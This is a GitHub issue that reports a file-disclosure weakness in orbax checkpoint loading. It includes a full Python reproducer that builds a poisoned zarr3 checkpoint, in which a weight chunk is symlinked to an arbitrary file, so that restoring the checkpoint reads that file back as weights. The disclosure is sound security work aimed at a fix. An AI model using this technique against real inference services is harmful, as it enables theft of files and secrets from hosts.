Skip to content

Is it possible to forbid reading symlinks from the checkpoint? #3375

Description

@vfdev-5

Is it possible to forbid reading symlinks from the checkpoint folder to avoid reading any files from the file system?

orbax_checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
restored = orbax_checkpointer.restore(ckpt_path, item=target)

It can be an issue if in a certain case, when a user has access to an infrastructure where they do not have full access but just some "inference engine" and they can load pretrained weights, so they can "attack" the system with poisoned weights and try to read files from the model weights.

Here is an orbax-checkpoint-only reproducer with detailed explanation:

from pathlib import Path
import shutil
import json
import numpy as np
import orbax.checkpoint as ocp


def make_poisoned_checkpoint(output_path: Path, file_to_read: Path, n: int):

    checkpointer = ocp.Checkpointer(
        ocp.PyTreeCheckpointHandler(use_ocdbt=False, use_zarr3=True)
    )
    checkpointer.save(output_path, {"w": np.zeros(n, np.uint8)})

    # make a symlink for the stored weights
    p = output_path / "w" / "c" / "0"
    assert p.exists()
    p.unlink()
    p.symlink_to(file_to_read)

    # replace zarr file
    p = output_path / "w" / "zarr.json"
    assert p.exists()
    p.unlink()
    with p.open("w") as f:
        obj = {
                "zarr_format": 3,
                "chunk_key_encoding": {"name": "default"},
                "node_type": "array",
                "fill_value": 0,
                "shape": [n],
                "data_type": "uint8",
                "chunk_grid": {
                    "name": "regular",
                    "configuration": {"chunk_shape": [n]}
                },
                "codecs":[{"name":"bytes"}],
            }
        json.dump(obj, f)


if __name__ == "__main__":
    # Context: Let's say we want to read a file from a remote machine where
    # we do not have direct FS access but we have an access to an inference engine
    # and can load a checkpoint and inspect model's parameters.

    # Step 1:
    # We prepare on a host machine a poisoned checkpoint with a symlink on the file
    # we want to read on remote machine
    file_to_read = Path("/tmp/some_data")

    with file_to_read.open("w") as f:
        f.write("this-is-a-secret")

    chkpt_out_folder = Path("/tmp/poisoned_chkpt")
    if chkpt_out_folder.exists():
        shutil.rmtree(chkpt_out_folder)

    # here we make a shortcut to get the exact number of bytes we need to make
    # two checkpoint and get the exact value when first tried to load the checkpoint
    # on the remote machine
    n = 22
    make_poisoned_checkpoint(chkpt_out_folder, file_to_read, n=n)

    # Step 2:
    # Now we are in the remote machine but we have a limited access:
    # we can load pretrained weights to a model and inspect model weights
    # We'll omit the model itself for simplicity

    # Write something else to the file on the remote machine
    with file_to_read.open("w") as f:
        f.write("this-is-another-secret")

    # We "download" the poisoned checkpoint
    ckpt_path = chkpt_out_folder
    # We load the checkpoint
    checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
    restored = checkpointer.restore(ckpt_path, item=None)
    # Now we can read the data from the file:
    print(bytes(np.asarray(restored["w"]).astype(np.uint8).tobytes()).splitlines()[0])
    # b'this-is-another-secret'

Context: google/flax#5487 (comment) and credits to the author of the issue.

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions